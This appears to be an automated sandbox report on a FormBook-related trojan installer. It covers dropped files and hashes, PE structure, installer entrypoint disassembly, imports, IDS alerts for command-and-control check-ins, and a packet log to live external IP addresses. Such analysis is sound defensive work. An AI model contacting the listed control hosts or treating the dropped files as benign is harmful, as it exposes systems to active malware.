                                                                                            Category:dropped
                                                                                            Size (bytes):5738
                                                                                            Entropy (8bit):7.164987839661835
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Farc6oY7g/DrYu+k2XO5oSwYiAVW9aRDGDprAhThqwDQgNDQXzL2gf:FarcRfWhX1S9H9tGlg9h3hgf
                                                                                            MD5:EE48E241B19CF476BAB747E7BFFBE1E6
                                                                                            SHA1:ECD535B070BAC75909809590AE8CEE602A65F8FF
                                                                                            SHA-256:2F25ECE58FD26C56F04DCDCDA1273E75D2101A78FD0717605F0148ADEA9E83EA
                                                                                            SHA-512:2ED2C6059DD18824BE7B217023A78B4FDCE37424D1C1949E896B4C311C16F084B86DC7178C06174A5ECC5988653AC97CB9B67307A6B766166BABC063B942AD57
                                                                                            Malicious:false
                                                                                            Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                                                            C:\Users\user\AppData\Local\Temp\nsjF9DC.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):326683
                                                                                            Entropy (8bit):7.56585074937259
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:llDH7L09bR9XjKk1c85uxmCum7ZjmOLPzCu/GZVZxML7L26P:llnL0w0cxxmidCODzCu/QZOL2
                                                                                            MD5:DB1F24D7DE5473B1FEB30958D5620614
                                                                                            SHA1:956E2FCB636FBA3FEFC9EBFCA96CCEC7605B252B
                                                                                            SHA-256:A635BBBC73BA851204F9242C529EF59C9C1A133D1A98D8BCBFE1B0161216400B
                                                                                            SHA-512:35D949222412B4CA343454A4CE247067C3A74B5CB4CCA3FFEAA0C0F7AE5734C82D6E552FB1EBB984A4953EA760F24BBF5C249B83FE3C85959AB78E6625F0B642
                                                                                            Malicious:false
                                                                                            Preview:.7......,........................(.......6......p7..............................................................................$...........................................................................................................................................................G...................j...........................................................................................................................................=...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\rdypmbfg.qv

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211481
                                                                                            Entropy (8bit):7.998948076055924
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:mKd38ED05C8QZ/bLX8NWvByZA6XRxnIGb/D/Kk7iVSc8k1wPuxD6QH+0gZm7IKjS:hlDH7L09bR9XjKk1c85uxmCum7ZjmOLy
                                                                                            MD5:4C2A176B3C04DB72501ED445A646E276
                                                                                            SHA1:26C8DCB493EB56374B0A96D5453BB535F7A515CC
                                                                                            SHA-256:F9713AB900F44015FD669DF94861D50D98281D447964913B0132E1CAC002351B
                                                                                            SHA-512:B0673860453637C95F09AE4766DBB10B5DFA0282D48B0B351EE8231C304C08EEADC721E8A64C941462E93C175431CECBE5F9530C2A5FDF937ADE42FCE3FA0ED5
                                                                                            Malicious:false
                                                                                            Preview:...R..#D6....N>.R.*.}jW.;Q.w;.E..|.r....b..eA..<..}U....^...t..qmu.......Ry..H.[...xe.(*....x.c3.<.P...;.\U..q^.P..Bl..a.i.v.5#.q..c.kj...EX.1..Y..5.eG..N=.u.@./.....V..V$6#.X...-.W(.'.....fh&.U....P#M.R.>..Ec..z4R.....*s..J.yEQ@..&.G..ntP........#..x...&..~...{.....\p7..E..|Br....b.1eA..<k.}U....^..)..X..n.%/....Y.k.J.....\Q.8.....t..#. *.\....n.'..n..]..Bl...."c?/~...E$o._..U.....F...).F.....^.6g..I..5..V..V$6#.{.LW-.WM4-.....A.4UN...P#M.R.AR..cO...4R.....*S`.J..EQ@tz.&.....tP.D..)....#D..x...&.....{......pw;.E..|.r....b..eA..<..}U....^..)..X..n.%/....Y.k.J.....\Q.8.....t..#. *.\....n.'..n..]..Bl...."c?/~...E$o._..U.....F...).F.....^.6g..I..5..V..V$6#.X...-.WYh'....[.4U....P#M.R.AR..c..z4R.....*S`.J..EQ@tz.&.....tP.D..)....#D..x...&.....{......pw;.E..|.r....b..eA..<..}U....^..)..X..n.%/....Y.k.J.....\Q.8.....t..#. *.\....n.'..n..]..Bl...."c?/~...E$o._..U.....F...).F.....^.6g..I..5..V..V$6#.X...-.WYh'....[.4U....P#M.R.AR..c..z4R.....*

                                                                                            C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):95232
                                                                                            Entropy (8bit):6.23150349499231
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:opZrDPCXLdr7zQN/GZGLaYeZjtBaKaedCRVLR8dpxekydJrD9iiU71aC4sWBlVmI:oHTCB7Y/GZGPeZxaGCRVLR9kydI7sCUJ
                                                                                            MD5:6D30D26416D626447BA4298A59111F6D
                                                                                            SHA1:C7F0941793929D391369F59FD92FFD4B2DC5C598
                                                                                            SHA-256:C53E0E6337805EC801493437F7811672A1B3C187611799116D5490AB2E63B1EC
                                                                                            SHA-512:79946C7F1D3F1F9A56ED7A3F6BCA739F73801B6BCEFB6CC41945BE28A4542A1FD511D52269A61DB887CD2DF42D8B87D7E497295FDBC9E226B25FDB745DF7940F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.8-?.V~?.V~?.V~t.U.5.V~t.S...V~t.R.+.V~..S...V~..R...V~..U.,.V~t.W.(.V~?.W~@.V~..^.>.V~..T.>.V~Rich?.V~........................PE..L...gX.d...............!.....z....................@.........................................................................<k.......................................^...............................]..@............................................text............................... ..`.rdata...e.......f..................@..@.data...l............j..............@...........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.926529383010501
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                                            File size:299717
                                                                                            MD5:c7714b273571ba64c0b77afca236ac6d
                                                                                            SHA1:c24d9460bee8a724abe8b0dcf3d74851dd5737ed
                                                                                            SHA256:e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
                                                                                            SHA512:e70d15e6d9e318e509013088a42f02c2298af5f85ca91c8463f1fb7fc3d5216ec7ef6e9a8c343f95f5a0b457260014d8c15c5e0b7e8d1a050c3963618adb159e
                                                                                            SSDEEP:6144:vYa69KnJK2Vi0/1olkMjLow/9AO3xVFLFlXT+rcYGRleg3Cdl2xHW7:vYnKndVJAnow/6O3xV5TD+rcYCKyy
                                                                                            TLSH:435412A63178C03BF5A141306F7512AA9EFDDA1278F90A0B4B901B6D7F7AB14650F393
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                            File Icon

                                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x403640
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 000003F4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            pop edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                            mov dword ptr [ebp-04h], 0040A230h
                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                            call dword ptr [004080C8h]
                                                                                            mov esi, dword ptr [004080CCh]
                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                            push eax
                                                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                                                            mov dword ptr [ebp-2Ch], ebx
                                                                                            mov dword ptr [ebp-28h], ebx
                                                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                            call esi
                                                                                            test eax, eax
                                                                                            jne 00007F57DC75144Ah
                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                                                            push eax
                                                                                            call esi
                                                                                            mov ax, word ptr [ebp-0000012Ch]
                                                                                            mov ecx, dword ptr [ebp-00000112h]
                                                                                            sub ax, 00000053h
                                                                                            add ecx, FFFFFFD0h
                                                                                            neg ax
                                                                                            sbb eax, eax
                                                                                            mov byte ptr [ebp-26h], 00000004h
                                                                                            not eax
                                                                                            and eax, ecx
                                                                                            mov word ptr [ebp-2Ch], ax
                                                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                            jnc 00007F57DC75141Ah
                                                                                            and word ptr [ebp-00000132h], 0000h
                                                                                            mov eax, dword ptr [ebp-00000134h]
                                                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                                                            mov dword ptr [0042A318h], eax
                                                                                            xor eax, eax
                                                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                                                            movzx eax, ax
                                                                                            or eax, ecx
                                                                                            xor ecx, ecx
                                                                                            mov ch, byte ptr [ebp-2Ch]
                                                                                            movzx ecx, cx
                                                                                            shl eax, 10h
                                                                                            or eax, ecx

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcd8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x3b0000xcd80xe00False0.4224330357142857data4.230532221238809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                                            RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                                                            RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                                                            RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                                                            RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                                                            RT_VERSION0x3b7580x240dataEnglishUnited States
                                                                                            RT_MANIFEST0x3b9980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                            Imports

                                                                                            DLLImport
                                                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            192.168.2.491.195.240.9449702802031449 03/20/23-17:00:09.343542TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.491.195.240.94
                                                                                            192.168.2.481.17.18.19849706802031412 03/20/23-17:00:25.955923TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.481.17.18.198
                                                                                            192.168.2.481.17.18.19849706802031453 03/20/23-17:00:25.955923TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.481.17.18.198
                                                                                            192.168.2.494.176.104.8649696802031453 03/20/23-16:59:46.201874TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969680192.168.2.494.176.104.86
                                                                                            192.168.2.491.195.240.9449702802031453 03/20/23-17:00:09.343542TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.491.195.240.94
                                                                                            192.168.2.494.176.104.8649696802031412 03/20/23-16:59:46.201874TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969680192.168.2.494.176.104.86
                                                                                            192.168.2.491.195.240.9449702802031412 03/20/23-17:00:09.343542TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.491.195.240.94
                                                                                            192.168.2.494.176.104.8649696802031449 03/20/23-16:59:46.201874TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969680192.168.2.494.176.104.86
                                                                                            192.168.2.481.17.18.19849706802031449 03/20/23-17:00:25.955923TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.481.17.18.198

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 20, 2023 16:59:46.164385080 CET4969680192.168.2.494.176.104.86
                                                                                            Mar 20, 2023 16:59:46.201606989 CET804969694.176.104.86192.168.2.4
                                                                                            Mar 20, 2023 16:59:46.201721907 CET4969680192.168.2.494.176.104.86
                                                                                            Mar 20, 2023 16:59:46.201874018 CET4969680192.168.2.494.176.104.86
                                                                                            Mar 20, 2023 16:59:46.239142895 CET804969694.176.104.86192.168.2.4
                                                                                            Mar 20, 2023 16:59:46.439270973 CET804969694.176.104.86192.168.2.4
                                                                                            Mar 20, 2023 16:59:46.439304113 CET804969694.176.104.86192.168.2.4
                                                                                            Mar 20, 2023 16:59:46.439450979 CET4969680192.168.2.494.176.104.86
                                                                                            Mar 20, 2023 16:59:46.439614058 CET4969680192.168.2.494.176.104.86
                                                                                            Mar 20, 2023 16:59:46.476691008 CET804969694.176.104.86192.168.2.4
                                                                                            Mar 20, 2023 16:59:51.479353905 CET4969780192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:51.508332968 CET804969778.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:51.510864019 CET4969780192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:51.510987997 CET4969780192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:51.538568974 CET804969778.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:51.538933992 CET804969778.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:51.539037943 CET804969778.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:51.539123058 CET4969780192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:53.025367975 CET4969780192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:54.043806076 CET4969880192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:54.071490049 CET804969878.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:54.071722031 CET4969880192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:54.072148085 CET4969880192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:54.099571943 CET804969878.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:54.099611998 CET804969878.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:54.099633932 CET804969878.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:54.099822998 CET4969880192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:54.100164890 CET4969880192.168.2.478.141.192.145
                                                                                            Mar 20, 2023 16:59:54.127706051 CET804969878.141.192.145192.168.2.4
                                                                                            Mar 20, 2023 16:59:59.126749039 CET4969980192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 16:59:59.153734922 CET8049699161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 16:59:59.153947115 CET4969980192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 16:59:59.154143095 CET4969980192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 16:59:59.181529999 CET8049699161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 16:59:59.182496071 CET8049699161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 16:59:59.182528019 CET8049699161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 16:59:59.182634115 CET4969980192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:00.666766882 CET4969980192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:01.683223009 CET4970080192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:01.707376957 CET8049700161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:01.707633018 CET4970080192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:01.707849026 CET4970080192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:01.731712103 CET8049700161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:01.732481956 CET8049700161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:01.732547998 CET8049700161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:01.732713938 CET4970080192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:01.732954979 CET4970080192.168.2.4161.97.163.8
                                                                                            Mar 20, 2023 17:00:01.756808043 CET8049700161.97.163.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:06.786604881 CET4970180192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:06.806010008 CET804970191.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:06.807351112 CET4970180192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:06.807351112 CET4970180192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:06.827474117 CET804970191.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:06.827512026 CET804970191.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:06.832981110 CET4970180192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:08.308280945 CET4970180192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.324009895 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.343242884 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.343389988 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.343542099 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.394530058 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394562960 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394582987 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394602060 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394620895 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394639969 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394659042 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394673109 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394748926 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394779921 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.394840002 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.394848108 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.394885063 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.413861036 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.413888931 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.413908958 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.413927078 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.413945913 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.413964033 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.413973093 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.413983107 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.414005041 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:09.414017916 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.414125919 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.414351940 CET4970280192.168.2.491.195.240.94
                                                                                            Mar 20, 2023 17:00:09.433420897 CET804970291.195.240.94192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.521128893 CET4970380192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:15.542534113 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.542710066 CET4970380192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:15.542984962 CET4970380192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:15.564192057 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.750376940 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.750427961 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.750452995 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.750571012 CET4970380192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:15.758713961 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.758759975 CET8049703213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.758881092 CET4970380192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:17.061141014 CET4970380192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.075567007 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.096821070 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.097018957 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.097170115 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.118226051 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.309756041 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.309793949 CET8049704213.145.228.111192.168.2.4
